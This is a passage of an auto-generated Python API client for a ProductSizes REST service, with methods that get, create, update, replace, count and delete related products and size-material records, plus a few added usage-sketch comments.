>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_delete_with_http_info(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_delete`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
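# Usage sketch (editorial addition): note this DELETE removes *all*
# products of the ProductSize and returns None, so success yields
# nothing to inspect; failures surface as exceptions raised by the
# underlying ApiClient.
#
#   api.product_sizes_id_products_delete('size-1')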
def product_sizes_id_products_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for products.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_fk_delete(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for products (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_fk_delete_with_http_info(id, fk, **kwargs)
else:
data = self.product_sizes_id_products_fk_delete_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_products_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for products.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_fk_delete_with_http_info(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for products (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_products_fk_delete`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_products_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for products.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_fk_get(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for products (required)
:return: Product
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_fk_get_with_http_info(id, fk, **kwargs)
else:
data = self.product_sizes_id_products_fk_get_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_products_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for products.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_fk_get_with_http_info(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for products (required)
:return: Product
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_products_fk_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Product',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
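# Usage sketch (editorial addition): fetching a single related product
# by its foreign key; both ids are hypothetical strings.
#
#   product = api.product_sizes_id_products_fk_get('size-1', 'prod-42')
#   pprint(product)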
def product_sizes_id_products_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for products.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_fk_put(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for products (required)
:param Product data:
:return: Product
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_fk_put_with_http_info(id, fk, **kwargs)
else:
data = self.product_sizes_id_products_fk_put_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_products_fk_put_with_http_info(self, id, fk, **kwargs):
"""
Update a related item by id for products.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_fk_put_with_http_info(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for products (required)
:param Product data:
:return: Product
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_fk_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_fk_put`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_products_fk_put`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Product',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_products_get(self, id, **kwargs):
"""
Queries products of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_get(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str filter:
:return: list[Product]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_get_with_http_info(id, **kwargs)
else:
data = self.product_sizes_id_products_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_products_get_with_http_info(self, id, **kwargs):
"""
Queries products of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_get_with_http_info(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str filter:
:return: list[Product]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'filter']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'filter' in params:
query_params['filter'] = params['filter']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Product]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
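# Usage sketch (editorial addition): the asynchronous path. Passing
# `callback` makes the call return the request thread immediately and
# deliver the deserialized list to the callback; joining the thread, as
# shown, simply waits for completion (assuming the returned object is a
# standard thread, as the docstrings state).
#
#   def on_products(products):
#       pprint(products)
#
#   thread = api.product_sizes_id_products_get(
#       'size-1', callback=on_products)
#   thread.join()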
def product_sizes_id_products_post(self, id, **kwargs):
"""
Creates a new instance in products of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_post(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param Product data:
:return: Product
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_products_post_with_http_info(id, **kwargs)
else:
data = self.product_sizes_id_products_post_with_http_info(id, **kwargs)
return data
def product_sizes_id_products_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in products of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_products_post_with_http_info(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param Product data:
:return: Product
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_products_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_products_post`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/products'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Product',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
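# Usage sketch (editorial addition): creating a product scoped to this
# size. As with the materials POST above, the body fields are
# illustrative and depend on the generated Product model.
#
#   product = api.product_sizes_id_products_post(
#       'size-1', data={'name': 'Poster A4'})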
def product_sizes_id_put(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_put(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param ProductSize data: Model instance data
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_put_with_http_info(id, **kwargs)
else:
data = self.product_sizes_id_put_with_http_info(id, **kwargs)
return data
def product_sizes_id_put_with_http_info(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_put_with_http_info(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param ProductSize data: Model instance data
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_put`")
collection_formats = {}
resource_path = '/ProductSizes/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSize',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_replace_post(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_replace_post(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param ProductSize data: Model instance data
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_replace_post_with_http_info(id, **kwargs)
else:
data = self.product_sizes_id_replace_post_with_http_info(id, **kwargs)
return data
def product_sizes_id_replace_post_with_http_info(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_replace_post_with_http_info(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param ProductSize data: Model instance data
:return: ProductSize
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_replace_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_replace_post`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/replace'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSize',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
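# Usage sketch (editorial addition): PUT /ProductSizes/{id} and
# POST /ProductSizes/{id}/replace both perform a full replacement of the
# instance's attributes (unlike PATCH, which is partial); the POST
# variant exists for clients that cannot issue PUT. `full_size` stands
# in for a complete ProductSize payload.
#
#   replaced = api.product_sizes_id_replace_post('size-1', data=full_size)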
def product_sizes_id_size_materials_count_get(self, id, **kwargs):
"""
Counts sizeMaterials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_count_get(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_size_materials_count_get_with_http_info(id, **kwargs)
else:
data = self.product_sizes_id_size_materials_count_get_with_http_info(id, **kwargs)
return data
def product_sizes_id_size_materials_count_get_with_http_info(self, id, **kwargs):
"""
Counts sizeMaterials of ProductSize.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_count_get_with_http_info(id, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'where']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_size_materials_count_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_size_materials_count_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/sizeMaterials/count'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'where' in params:
query_params['where'] = params['where']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
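# Usage sketch (editorial addition): counting the through-model records
# (sizeMaterials) rather than the materials themselves; `where` again
# takes a JSON string, and the field name below is hypothetical.
#
#   n = api.product_sizes_id_size_materials_count_get(
#       'size-1', where='{"materialId": "mat-9"}')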
def product_sizes_id_size_materials_fk_delete(self, id, fk, **kwargs):
"""
Delete a related item by id for sizeMaterials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
...     pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_fk_delete(id, fk, callback=callback_function)
:param function callback: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for sizeMaterials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_size_materials_fk_delete_with_http_info(id, fk, **kwargs)
else:
data = self.product_sizes_id_size_materials_fk_delete_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_size_materials_fk_delete_with_http_info(self, id, fk, **kwargs):
"""
Delete a related item by id for sizeMaterials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_fk_delete_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for sizeMaterials (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_size_materials_fk_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_size_materials_fk_delete`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_size_materials_fk_delete`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/sizeMaterials/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_size_materials_fk_get(self, id, fk, **kwargs):
"""
Find a related item by id for sizeMaterials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_fk_get(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for sizeMaterials (required)
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.product_sizes_id_size_materials_fk_get_with_http_info(id, fk, **kwargs)
else:
(data) = self.product_sizes_id_size_materials_fk_get_with_http_info(id, fk, **kwargs)
return data
def product_sizes_id_size_materials_fk_get_with_http_info(self, id, fk, **kwargs):
"""
Find a related item by id for sizeMaterials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_fk_get_with_http_info(id, fk, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: ProductSize id (required)
:param str fk: Foreign key for sizeMaterials (required)
:return: ProductSizeMaterial
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'fk']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method product_sizes_id_size_materials_fk_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `product_sizes_id_size_materials_fk_get`")
# verify the required parameter 'fk' is set
if ('fk' not in params) or (params['fk'] is None):
raise ValueError("Missing the required parameter `fk` when calling `product_sizes_id_size_materials_fk_get`")
collection_formats = {}
resource_path = '/ProductSizes/{id}/sizeMaterials/{fk}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'fk' in params:
path_params['fk'] = params['fk']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProductSizeMaterial',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def product_sizes_id_size_materials_fk_put(self, id, fk, **kwargs):
"""
Update a related item by id for sizeMaterials.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.product_sizes_id_size_materials_fk_put(id, fk, callback=callback_function)
